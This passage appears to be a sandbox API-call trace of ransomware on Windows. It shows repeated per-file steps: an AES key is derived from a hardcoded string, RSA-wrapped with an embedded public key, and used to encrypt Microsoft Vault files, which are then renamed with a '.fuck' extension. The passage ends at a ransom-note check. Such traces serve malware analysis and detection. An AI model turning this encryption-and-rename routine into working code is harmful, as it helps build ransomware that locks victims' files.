[0240.615] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.615] CloseHandle (hObject=0xffffffff) returned 1 [0240.615] CloseHandle (hObject=0xffffffff) returned 1 [0240.615] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch.gsg" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch"), bFailIfExists=0) returned 0 [0240.616] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch", dwFileAttributes=0x0) returned 0 [0240.617] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch.gsg" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch.gsg")) returned 0 [0240.617] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch.fuck" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch.fuck")) returned 0 [0240.618] CryptDestroyHash (hHash=0x28e8578) returned 1 [0240.618] CryptDestroyKey (hKey=0x28e6fb8) returned 1 [0240.618] CryptReleaseContext (hProv=0x28f8548, dwFlags=0x0) returned 1 [0240.618] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.618] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.618] GetLastError () returned 0x5 [0240.618] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch")) returned 0x20 [0240.619] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch", dwFileAttributes=0x80) returned 0 [0240.619] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.619] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch.gsg" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.620] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch.gsg", dwFileAttributes=0x2) returned 0 [0240.620] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28f8768) returned 1 [0240.623] CryptCreateHash (in: hProv=0x28f8768, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.623] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.623] CryptHashData (hHash=0x28e8578, pbData=0x2857178, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.623] CryptDeriveKey (in: hProv=0x28f8768, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28e7238) returned 1 [0240.623] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.623] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.623] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28f8328) returned 1 [0240.624] CryptImportPublicKeyInfo (in: hCryptProv=0x28f8328, dwCertEncodingType=0x1, pInfo=0x29062b8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29062e8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29062f0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28e6db8) returned 1 [0240.624] CryptEncrypt (in: hKey=0x28e6db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.624] CryptEncrypt (in: hKey=0x28e6db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f87f0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28f87f0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.624] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f87f0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.624] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.624] CryptEncrypt (in: hKey=0x28e7238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.624] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.624] CloseHandle (hObject=0xffffffff) returned 1 [0240.624] CloseHandle (hObject=0xffffffff) returned 1 [0240.625] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch.gsg" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch"), bFailIfExists=0) returned 0 [0240.625] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch", dwFileAttributes=0x0) returned 0 [0240.626] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch.gsg" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch.gsg")) returned 0 [0240.626] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch.fuck" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch.fuck")) returned 0 [0240.626] CryptDestroyHash (hHash=0x28e8578) returned 1 [0240.627] CryptDestroyKey (hKey=0x28e7238) returned 1 [0240.627] CryptReleaseContext (hProv=0x28f8768, dwFlags=0x0) returned 1 [0240.627] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.627] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.627] GetLastError () returned 0x5 [0240.627] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch")) returned 0x20 [0240.627] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch", dwFileAttributes=0x80) returned 0 [0240.627] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.628] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch.gsg" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.628] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch.gsg", dwFileAttributes=0x2) returned 0 [0240.629] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28f8878) returned 1 [0240.632] CryptCreateHash (in: hProv=0x28f8878, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.632] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.632] CryptHashData (hHash=0x28e8578, pbData=0x28574c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.632] CryptDeriveKey (in: hProv=0x28f8878, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28e7238) returned 1 [0240.632] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.632] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.632] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28f8900) returned 1 [0240.633] CryptImportPublicKeyInfo (in: hCryptProv=0x28f8900, dwCertEncodingType=0x1, pInfo=0x2905a98*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2905ac8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2905ad0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28e6fb8) returned 1 [0240.633] CryptEncrypt (in: hKey=0x28e6fb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.633] CryptEncrypt (in: hKey=0x28e6fb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f8988*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28f8988*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.633] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f8988, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.633] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.633] CryptEncrypt (in: hKey=0x28e7238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.633] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.633] CloseHandle (hObject=0xffffffff) returned 1 [0240.633] CloseHandle (hObject=0xffffffff) returned 1 [0240.633] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch.gsg" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch"), bFailIfExists=0) returned 0 [0240.634] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch", dwFileAttributes=0x0) returned 0 [0240.634] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch.gsg" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch.gsg")) returned 0 [0240.635] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch.fuck" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch.fuck")) returned 0 [0240.635] CryptDestroyHash (hHash=0x28e8578) returned 1 [0240.635] CryptDestroyKey (hKey=0x28e7238) returned 1 [0240.635] CryptReleaseContext (hProv=0x28f8878, dwFlags=0x0) returned 1 [0240.636] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.636] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.636] GetLastError () returned 0x5 [0240.636] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol")) returned 0x20 [0240.636] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol", dwFileAttributes=0x80) returned 0 [0240.636] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.637] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol.gsg" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.637] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol.gsg", dwFileAttributes=0x2) returned 0 [0240.638] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28f6348) returned 1 [0240.640] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.640] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.640] CryptHashData (hHash=0x28e8578, pbData=0x2857470, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.640] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28e6b78) returned 1 [0240.641] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.641] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.641] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28f8768) returned 1 [0240.641] CryptImportPublicKeyInfo (in: hCryptProv=0x28f8768, dwCertEncodingType=0x1, pInfo=0x2906388*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29063b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29063c0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28e7038) returned 1 [0240.641] CryptEncrypt (in: hKey=0x28e7038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.641] CryptEncrypt (in: hKey=0x28e7038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f8878*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28f8878*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.641] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f8878, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.642] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.642] CryptEncrypt (in: hKey=0x28e6b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.642] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.642] CloseHandle (hObject=0xffffffff) returned 1 [0240.642] CloseHandle (hObject=0xffffffff) returned 1 [0240.642] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol.gsg" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol"), bFailIfExists=0) returned 0 [0240.642] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol", dwFileAttributes=0x0) returned 0 [0240.643] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol.gsg" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol.gsg")) returned 0 [0240.643] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol.fuck" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol.fuck")) returned 0 [0240.644] CryptDestroyHash (hHash=0x28e8578) returned 1 [0240.644] CryptDestroyKey (hKey=0x28e6b78) returned 1 [0240.644] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0240.644] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.644] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.644] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\README_BACK_FILES.htm" (normalized: "c:\\users\\all 